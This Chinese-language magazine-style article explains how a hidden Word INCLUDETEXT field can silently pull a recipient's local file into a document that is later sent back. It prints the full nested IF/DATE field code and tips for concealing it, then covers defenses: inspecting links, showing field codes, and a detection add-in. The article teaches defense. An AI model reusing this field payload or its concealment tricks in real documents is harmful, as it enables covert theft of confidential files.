一、无声的攻击
下属B给领导A发了一个Word文档,按照正常的办公流程,领导A应该在修订、签署文档后把它发回给下属B。领导A先给Word文档杀毒,确认文档安全之后才打开它。但是,当最后领导A把已签字的文档发回给下属B时,这个Word文档却顺手牵羊,偷走了领导A电脑上的一份机密文档c:\a.txt。
那么,下属B是怎样完成这次窃密的呢?原来,下属B在文档中插入了一个INCLUDETEXT域。这个域插入到了文档最后一页的脚注之中,域的完整代码是:{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\\a.txt" "c:\\a.txt" } \* MERGEFORMAT } = "" "" \* MERGEFORMAT }。其中INCLUDETEXT域的作用就是把指定的文件嵌入到当前文档,但它不是宏,所以不会引起Word的安全警告。
用INCLUDETEXT域实施攻击时,有两个关键的问题需要解决:第一,必须隐藏INCLUDETEXT域,避免INCLUDETEXT域被领导A发现;第二,INCLUDETEXT域必须在经过一次更新操作后才会引入目标文件。
首先来看第一个问题。要隐藏INCLUDETEXT域,可以根据Word文档的结构特点,采用多种办法,例如隐藏文字、小而无色的字体等。一种比较通用的办法是,将INCLUDETEXT域嵌入到一个“哑”的IF域。所谓哑的IF域,就是输出结果总是空字符串的IF域。
至于INCLUDETEXT域的更新问题,对于大型的、包含许多正常域的Word文档,这通常不存在问题,因为收到文档的人一般会更新所有的域。但是,下属B采用了一个更好的办法,即在INCLUDETEXT域里面嵌入了一个DATE域,且这个DATE域是文档中的最后一个DATE域,于是整个域就变成了自动更新的域。
下面我们来看看如何避免这种信息泄漏。
二、坚固的防御
显然,这种攻击如果要得逞,攻击者必须知道机密文档的确切名称和路径。但是,对于一起工作的同事来说,攻击成功的可能性大大增加。例如,如果某个人没有访问服务器上共享文件的权限,但知道共享目录和文件的位置、名称,他就可以借助这种攻击,利用另一个人的身份获得共享文件。
为了将这种攻击的风险降低到最低限度,一般可以采取的措施有:第一,利用“编辑”→“链接”菜单,看看是否有链接的文件;第二,手工搜索域,分析每一个域是否合法。选择菜单“工具”→“选项”,打开“视图”选项卡,选中“显示”部分的“域代码”,“域低纹”一栏选择“始终显示”,这样就把Word文档包含的所有域突出显示,为检查域代码带来了方便。
另外,如果你经常要收到来源不是很可靠的Word文档,而且总是要修订文档之后把文档发回去,手工检查域代码的办法肯定太麻烦,有一个免费工具可以帮助你,这就是Hidden File Detector。从www.wordsite.com/HiddenFileDetector.html或www.woodyswatch.com/util/sniff/下载Hidden File Detector,文件很小,不到100KB。下载好之后解开压缩,得到一个Word插件HiddenFileDetector_Addin.dot。按照如下步骤安装插件:
1.启动Word,选择菜单“工具”→“选项”,打开“文件位置”选项卡。
2.双击“启动”这一项,出现“修改位置”对话框,点击“查找范围”后面的下拉按钮,记下Word的STARTUP文件夹的位置。
3.关闭“修改位置”对话框和“选项”对话框。退出Word。
4.把HiddenFileDetector_Addin.dot复制到Word的STARTUP文件夹。注意:如果你在Windows资源管理器中找不到Word的STARTUP文件夹,可能这个文件夹被隐藏了。显示隐藏文件夹的方法是:点击Windows资源管理器的菜单“工具”→“文件夹选项”,选择“查看”选项卡,在“高级设置”列表中选中“显示所有文件和文件夹”。
5.重新启动Word,“工具”菜单下面会增加一个新的Detect Hidden Files菜单,如图一。
图一
例如,假设Word文档通过INCLUDETEXT域引入了c:\a.txt和c:\test\机密文件.doc两个文件,点击Detect Hidden Files菜单,出现图二的报告,一切窃密行为将无法遁形!
图二